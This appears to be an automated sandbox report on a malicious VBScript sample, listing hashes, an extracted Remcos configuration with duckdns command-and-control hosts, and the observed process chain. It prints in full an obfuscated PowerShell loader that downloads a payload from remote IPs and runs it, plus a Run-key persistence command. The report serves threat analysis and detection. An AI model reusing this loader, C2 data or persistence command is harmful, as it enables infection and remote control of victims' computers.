Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
25-06-2024 01:01
Static task
static1
Behavioral task
behavioral1
Sample
028a85e18dd99a848c0effc35a2dfca733965b21ee7f493774f2b942a1be1c72.vbs
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
028a85e18dd99a848c0effc35a2dfca733965b21ee7f493774f2b942a1be1c72.vbs
Resource
win10v2004-20240508-en
General
-
Target
028a85e18dd99a848c0effc35a2dfca733965b21ee7f493774f2b942a1be1c72.vbs
-
Size
186KB
-
MD5
8378482dfb00608563257af10d70c96d
-
SHA1
493b67c86ea9ca8ecb60f0388356ff0b8c1b5f40
-
SHA256
028a85e18dd99a848c0effc35a2dfca733965b21ee7f493774f2b942a1be1c72
-
SHA512
b31c395abe57132700c6056de274dbfa92fc105d0e35c73618ec004f0639acbd3411b252374ea4a14a805cb5e4dfd817e7ca7f9096a4931f22a060e7938ec3a7
-
SSDEEP
3072:BmN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZz:B08GxbKja3+DCbKCvBB/WnHXC/sLJFJ2
Malware Config
Extracted
remcos
NJARI
iwarsut775laudrye2.duckdns.org:57484
iwarsut775laudrye2.duckdns.org:57483
iwarsut775laudrye3.duckdns.org:57484
hjnourt38haoust1.duckdns.org:57484
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
sfvnspt.dat
-
keylog_flag
false
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
shietgtst-BB0OO6
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
- startup_value
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
Processes:
WScript.exepowershell.exeflow pid process 2 2036 WScript.exe 6 2820 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\Corynebacterium = "%Chorobates% -w 1 $Ledebjlke=(Get-ItemProperty -Path 'HKCU:\\Triennales253\\').Udstraalingen;%Chorobates% ($Ledebjlke)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 2960 wab.exe 2960 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2452 powershell.exe 2960 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2452 set thread context of 2960 2452 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepid process 2820 powershell.exe 2452 powershell.exe 2452 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2452 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2820 powershell.exe Token: SeDebugPrivilege 2452 powershell.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
WScript.exepowershell.exepowershell.exewab.execmd.exedescription pid process target process PID 2036 wrote to memory of 2820 2036 WScript.exe powershell.exe PID 2036 wrote to memory of 2820 2036 WScript.exe powershell.exe PID 2036 wrote to memory of 2820 2036 WScript.exe powershell.exe PID 2820 wrote to memory of 2456 2820 powershell.exe cmd.exe PID 2820 wrote to memory of 2456 2820 powershell.exe cmd.exe PID 2820 wrote to memory of 2456 2820 powershell.exe cmd.exe PID 2820 wrote to memory of 2452 2820 powershell.exe powershell.exe PID 2820 wrote to memory of 2452 2820 powershell.exe powershell.exe PID 2820 wrote to memory of 2452 2820 powershell.exe powershell.exe PID 2820 wrote to memory of 2452 2820 powershell.exe powershell.exe PID 2452 wrote to memory of 1820 2452 powershell.exe cmd.exe PID 2452 wrote to memory of 1820 2452 powershell.exe cmd.exe PID 2452 wrote to memory of 1820 2452 powershell.exe cmd.exe PID 2452 wrote to memory of 1820 2452 powershell.exe cmd.exe PID 2452 wrote to memory of 2960 2452 powershell.exe wab.exe PID 2452 wrote to memory of 2960 2452 powershell.exe wab.exe PID 2452 wrote to memory of 2960 2452 powershell.exe wab.exe PID 2452 wrote to memory of 2960 2452 powershell.exe wab.exe PID 2452 wrote to memory of 2960 2452 powershell.exe wab.exe PID 2452 wrote to memory of 2960 2452 powershell.exe wab.exe PID 2960 wrote to memory of 1980 2960 wab.exe cmd.exe PID 2960 wrote to memory of 1980 2960 wab.exe cmd.exe PID 2960 wrote to memory of 1980 2960 wab.exe cmd.exe PID 2960 wrote to memory of 1980 2960 wab.exe cmd.exe PID 1980 wrote to memory of 1756 1980 cmd.exe reg.exe PID 1980 wrote to memory of 1756 1980 cmd.exe reg.exe PID 1980 wrote to memory of 1756 1980 cmd.exe reg.exe PID 1980 wrote to memory of 1756 1980 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\028a85e18dd99a848c0effc35a2dfca733965b21ee7f493774f2b942a1be1c72.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Hardness Outbuzz Trinflgerne Forbindelsesofficers Befordringsmidlets Riposterende Ggegule Ansvarsfulderes Sindsoprrtes Cledge Parkeringslygters Tangsnarre Subgranularity Prjudicere Kompasser Communicatory Preadapt Narvside Unexceptionality Lovkataloger Hydrografer Lsehoveds Preshrink Dramaturgist';$Friturekogerens = 1;Function Fradmmtes($Ankles){$Pantstningerne=$Ankles.Length-$Friturekogerens;$Afskning='SUBSTRIN';$Afskning+='G';For( $Svrhedsgrads=1;$Svrhedsgrads -lt $Pantstningerne;$Svrhedsgrads+=2){$Hardness+=$Ankles.$Afskning.Invoke( $Svrhedsgrads, $Friturekogerens);}$Hardness;}function Dactyliographer($Sinuates){ & ($Bortfrsler) ($Sinuates);}$Pseudoinspirational=Fradmmtes 'PMFo zAi l,lGa /F5D.I0. ,( W iRn dDoCw s N,TC 1 0,.P0P;G WGibnA6,4 ;S x,6L4P;U GrUvK: 1 2 1F. 0,) GCeTc kBoF/ 2 0,1s0.0I1 0.1, HF.i rLeOf,o x /,1 2 1..E0H ';$Unbaptizes=Fradmmtes 'MU sHeWr,-LASg e.n t. ';$Befordringsmidlets=Fradmmtes 'Hh t.t pB:K/ / 1O9P4,.P5.9 .F3,1 . 1C3 7K/IWVa,tGtmeBs,t..Fp f bT>,hBt tAp : /p/,9 4 .I1 5R6H.,8,.S8C8 / Wca.t.tMeFs t ..pAfwbc ';$Multiferous=Fradmmtes 'B>r ';$Bortfrsler=Fradmmtes 'HiMe xJ ';$Alanyl='Ansvarsfulderes';$faraoens = Fradmmtes ',eFc h oA %Sahp pBdLaLtRaE%G\ T.v,a.nSgDs a rTbTe,jCdDeT.FAVf vB &K& geKc,h.oI KtS ';Dactyliographer (Fradmmtes 'H$Sg l oGbPaRl :CC yRc l.oRgArBa pPhC=E(FcMmHdS M/ c. G$RfCa,rUa oSernUsH)a ');Dactyliographer (Fradmmtes ' $,gSlRoOb aVlI:NF.oPrJbHi n dMeAl sAe s oCf f iUc eBr sR=E$ B eVfIoSrHdPr.iPnIg,sSmAi.dKl e.tHs..SsSp lui.t (.$FM,u l t iNf e rPo uSsI) ');Dactyliographer (Fradmmtes ' [ N.eTtV.,S.eGrSvSi c,eCPDoGi.n.tTM.a.nBaAg e,r.]i:C: S,e cTuIr,i,t.y PSr.o,t.ofcJoSlw = .[oN eAtM.FSSeMcVuTrsiMt.yTPArAoFt o c o,lRToy p eT]A:P: TGl sS1T2S ');$Befordringsmidlets=$Forbindelsesofficers[0];$Suevi= (Fradmmtes ',$TgClSo bNa.l : gJo uBrOdFhre.aOd =UN e,w -,O bcjWe,c,t, iSPy sStAeSm..TNAe,t..RWAe bJC.l.iCeRnUt');$Suevi+=$Cyclograph[1];Dactyliographer ($Suevi);Dactyliographer (Fradmmtes 'G$AgHo uCrDd hEe aSdV.PH ePa d,e,rEsH[.$NUTn b aPptt,iPzHeKs ]G=U$FPSs ebuEdUo,i,nJs pTiZrAaot i.oKnLaDlH ');$Cicisbeo=Fradmmtes 'k$Kg.o.u rDd h e.aGd ..Dso w,nslOoFaFdPF i.lbeI(R$ BGe f,o rod r.i.nMg s mFi.dSl.e tSsS,R$ L s,e h o.v e d sC) ';$Lsehoveds=$Cyclograph[0];Dactyliographer (Fradmmtes 'C$ g lGo b aTl.:.V iKlml a eAn s,=T(iT eEsHtS- Pma tNhC $.LFsLe,hWoBvRe dLs ), ');while (!$Villaens) {Dactyliographer (Fradmmtes 'p$Fg l,o bMa lA:SS dUsBu pApFeSr sA=.$ht.r,uDen ') ;Dactyliographer $Cicisbeo;Dactyliographer (Fradmmtes '.SAt aPr tM-.S lKe e,p R4R ');Dactyliographer (Fradmmtes 'F$,g.lVoSbPaDl,: VPi l lRa e.n so=n( T e,sWtF-.P.aTtGh, .$ L s e h oavSeTd,sD)S ') ;Dactyliographer (Fradmmtes 'B$ gTl oOb a l.:BT r i.n f l g e rSnseN= $ gSl oBb aFlU:TOauRt b,uFz.zT+.+ % $.F oDrGb,iHnSd e.l s eBscoAfFf i cSerrFs,.ScTo,u,n tB ') ;$Befordringsmidlets=$Forbindelsesofficers[$Trinflgerne];}$Albumen=332897;$Gerontal=26524;Dactyliographer (Fradmmtes ' $Og lPopbTa l :ISMiBn d.s oSpSr rKt.eAsK N=, TG.eEtM-MC o.nRtDeEnCt A$SLUsDe.h oSvAe d sC ');Dactyliographer (Fradmmtes '.$ gOlAoSbSa l.: n y.hva vMn. ,=P F[SSDyIsftTeCmR.,COo.n,vVe r.t ]P:S:.FSr.o,m B aUs eP6 4RS tOr i nfg.(E$ S iHnfdSs o.p rtr,tDe s.)H ');Dactyliographer (Fradmmtes 'S$AgMl.o bHaIl,:ST,a.n gIsBn,a r,r.eG =A ,[lS y.sDtPe m,. T ePx t .sE.nRc o,dRi.n gs].:G:AASS,C IRIr.SG.e tES tGr,iEnEgS(.$ nSy,hCa vPnD) ');Dactyliographer (Fradmmtes ' $ gSl o bCa,lG:PFTeFsCtNmRisd d a g eRn.e s =.$ TOa nOgms n,aMrSrVeC.RsSuBb.sTtOr i n.gf(i$ ABlDb u m e,n , $ GHeprNo nEtFaIl.)N ');Dactyliographer $Festmiddagenes;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tvangsarbejde.Afv && echo t"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Hardness Outbuzz Trinflgerne Forbindelsesofficers Befordringsmidlets Riposterende Ggegule Ansvarsfulderes Sindsoprrtes Cledge Parkeringslygters Tangsnarre Subgranularity Prjudicere Kompasser Communicatory Preadapt Narvside Unexceptionality Lovkataloger Hydrografer Lsehoveds Preshrink Dramaturgist';$Friturekogerens = 1;Function Fradmmtes($Ankles){$Pantstningerne=$Ankles.Length-$Friturekogerens;$Afskning='SUBSTRIN';$Afskning+='G';For( $Svrhedsgrads=1;$Svrhedsgrads -lt $Pantstningerne;$Svrhedsgrads+=2){$Hardness+=$Ankles.$Afskning.Invoke( $Svrhedsgrads, $Friturekogerens);}$Hardness;}function Dactyliographer($Sinuates){ & ($Bortfrsler) ($Sinuates);}$Pseudoinspirational=Fradmmtes 'PMFo zAi l,lGa /F5D.I0. ,( W iRn dDoCw s N,TC 1 0,.P0P;G WGibnA6,4 ;S x,6L4P;U GrUvK: 1 2 1F. 0,) GCeTc kBoF/ 2 0,1s0.0I1 0.1, HF.i rLeOf,o x /,1 2 1..E0H ';$Unbaptizes=Fradmmtes 'MU sHeWr,-LASg e.n t. ';$Befordringsmidlets=Fradmmtes 'Hh t.t pB:K/ / 1O9P4,.P5.9 .F3,1 . 1C3 7K/IWVa,tGtmeBs,t..Fp f bT>,hBt tAp : /p/,9 4 .I1 5R6H.,8,.S8C8 / Wca.t.tMeFs t ..pAfwbc ';$Multiferous=Fradmmtes 'B>r ';$Bortfrsler=Fradmmtes 'HiMe xJ ';$Alanyl='Ansvarsfulderes';$faraoens = Fradmmtes ',eFc h oA %Sahp pBdLaLtRaE%G\ T.v,a.nSgDs a rTbTe,jCdDeT.FAVf vB &K& geKc,h.oI KtS ';Dactyliographer (Fradmmtes 'H$Sg l oGbPaRl :CC yRc l.oRgArBa pPhC=E(FcMmHdS M/ c. G$RfCa,rUa oSernUsH)a ');Dactyliographer (Fradmmtes ' $,gSlRoOb aVlI:NF.oPrJbHi n dMeAl sAe s oCf f iUc eBr sR=E$ B eVfIoSrHdPr.iPnIg,sSmAi.dKl e.tHs..SsSp lui.t (.$FM,u l t iNf e rPo uSsI) ');Dactyliographer (Fradmmtes ' [ N.eTtV.,S.eGrSvSi c,eCPDoGi.n.tTM.a.nBaAg e,r.]i:C: S,e cTuIr,i,t.y PSr.o,t.ofcJoSlw = .[oN eAtM.FSSeMcVuTrsiMt.yTPArAoFt o c o,lRToy p eT]A:P: TGl sS1T2S ');$Befordringsmidlets=$Forbindelsesofficers[0];$Suevi= (Fradmmtes ',$TgClSo bNa.l : gJo uBrOdFhre.aOd =UN e,w -,O bcjWe,c,t, iSPy sStAeSm..TNAe,t..RWAe bJC.l.iCeRnUt');$Suevi+=$Cyclograph[1];Dactyliographer ($Suevi);Dactyliographer (Fradmmtes 'G$AgHo uCrDd hEe aSdV.PH ePa d,e,rEsH[.$NUTn b aPptt,iPzHeKs ]G=U$FPSs ebuEdUo,i,nJs pTiZrAaot i.oKnLaDlH ');$Cicisbeo=Fradmmtes 'k$Kg.o.u rDd h e.aGd ..Dso w,nslOoFaFdPF i.lbeI(R$ BGe f,o rod r.i.nMg s mFi.dSl.e tSsS,R$ L s,e h o.v e d sC) ';$Lsehoveds=$Cyclograph[0];Dactyliographer (Fradmmtes 'C$ g lGo b aTl.:.V iKlml a eAn s,=T(iT eEsHtS- Pma tNhC $.LFsLe,hWoBvRe dLs ), ');while (!$Villaens) {Dactyliographer (Fradmmtes 'p$Fg l,o bMa lA:SS dUsBu pApFeSr sA=.$ht.r,uDen ') ;Dactyliographer $Cicisbeo;Dactyliographer (Fradmmtes '.SAt aPr tM-.S lKe e,p R4R ');Dactyliographer (Fradmmtes 'F$,g.lVoSbPaDl,: VPi l lRa e.n so=n( T e,sWtF-.P.aTtGh, .$ L s e h oavSeTd,sD)S ') ;Dactyliographer (Fradmmtes 'B$ gTl oOb a l.:BT r i.n f l g e rSnseN= $ gSl oBb aFlU:TOauRt b,uFz.zT+.+ % $.F oDrGb,iHnSd e.l s eBscoAfFf i cSerrFs,.ScTo,u,n tB ') ;$Befordringsmidlets=$Forbindelsesofficers[$Trinflgerne];}$Albumen=332897;$Gerontal=26524;Dactyliographer (Fradmmtes ' $Og lPopbTa l :ISMiBn d.s oSpSr rKt.eAsK N=, TG.eEtM-MC o.nRtDeEnCt A$SLUsDe.h oSvAe d sC ');Dactyliographer (Fradmmtes '.$ gOlAoSbSa l.: n y.hva vMn. ,=P F[SSDyIsftTeCmR.,COo.n,vVe r.t ]P:S:.FSr.o,m B aUs eP6 4RS tOr i nfg.(E$ S iHnfdSs o.p rtr,tDe s.)H ');Dactyliographer (Fradmmtes 'S$AgMl.o bHaIl,:ST,a.n gIsBn,a r,r.eG =A ,[lS y.sDtPe m,. T ePx t .sE.nRc o,dRi.n gs].:G:AASS,C IRIr.SG.e tES tGr,iEnEgS(.$ nSy,hCa vPnD) ');Dactyliographer (Fradmmtes ' $ gSl o bCa,lG:PFTeFsCtNmRisd d a g eRn.e s =.$ TOa nOgms n,aMrSrVeC.RsSuBb.sTtOr i n.gf(i$ ABlDb u m e,n , $ GHeprNo nEtFaIl.)N ');Dactyliographer $Festmiddagenes;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tvangsarbejde.Afv && echo t"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Corynebacterium" /t REG_EXPAND_SZ /d "%Chorobates% -w 1 $Ledebjlke=(Get-ItemProperty -Path 'HKCU:\Triennales253\').Udstraalingen;%Chorobates% ($Ledebjlke)"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Corynebacterium" /t REG_EXPAND_SZ /d "%Chorobates% -w 1 $Ledebjlke=(Get-ItemProperty -Path 'HKCU:\Triennales253\').Udstraalingen;%Chorobates% ($Ledebjlke)"6⤵
- Adds Run key to start application
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PHLCMOQBI01Q4SM4CHW5.tempFilesize
7KB
MD56ee78b68a72b7781f44b2c5b4be4f8c1
SHA1486ce513040df1bd75ef147d166201e9cd209f4a
SHA256aa7f93348926b5b36c18bd5b88c0ead457ab3f0d7459fbc94d3ec4ba4abffe9f
SHA5128a917c43d05e71629d494055aae03eba16821c493d3cb30c182403fb8fa665e1aa6f955f53017f924087d05a1eb514f5e976166515b82082844259c15c75a50e
-
C:\Users\Admin\AppData\Roaming\Tvangsarbejde.AfvFilesize
467KB
MD5ebc603f013333acdb9edeeec3419d49d
SHA1d2ae4118a93874422ffa464dc225e7da16483a91
SHA256d56548cb4c363a5243f55e8602b2f45050cdcc89fae1dbe79f38488a4cac509b
SHA512ec13e53881778cda945c180452d8ab49b90068f136462b3c0e31789dc9306b178e4ade472f5ebcadbc420405773a0a303bb92bec16b666114c2e5b21e94967d1
-
memory/2452-35-0x0000000006880000-0x000000000B53E000-memory.dmpFilesize
76.7MB
-
memory/2820-25-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmpFilesize
9.6MB
-
memory/2820-21-0x000007FEF60AE000-0x000007FEF60AF000-memory.dmpFilesize
4KB
-
memory/2820-26-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmpFilesize
9.6MB
-
memory/2820-27-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmpFilesize
9.6MB
-
memory/2820-28-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmpFilesize
9.6MB
-
memory/2820-23-0x0000000002790000-0x0000000002798000-memory.dmpFilesize
32KB
-
memory/2820-24-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmpFilesize
9.6MB
-
memory/2820-34-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmpFilesize
9.6MB
-
memory/2820-22-0x000000001B6E0000-0x000000001B9C2000-memory.dmpFilesize
2.9MB
-
memory/2820-36-0x000007FEF60AE000-0x000007FEF60AF000-memory.dmpFilesize
4KB
-
memory/2820-43-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmpFilesize
9.6MB
-
memory/2960-38-0x0000000001000000-0x0000000002062000-memory.dmpFilesize
16.4MB
-
memory/2960-41-0x0000000002070000-0x0000000006D2E000-memory.dmpFilesize
76.7MB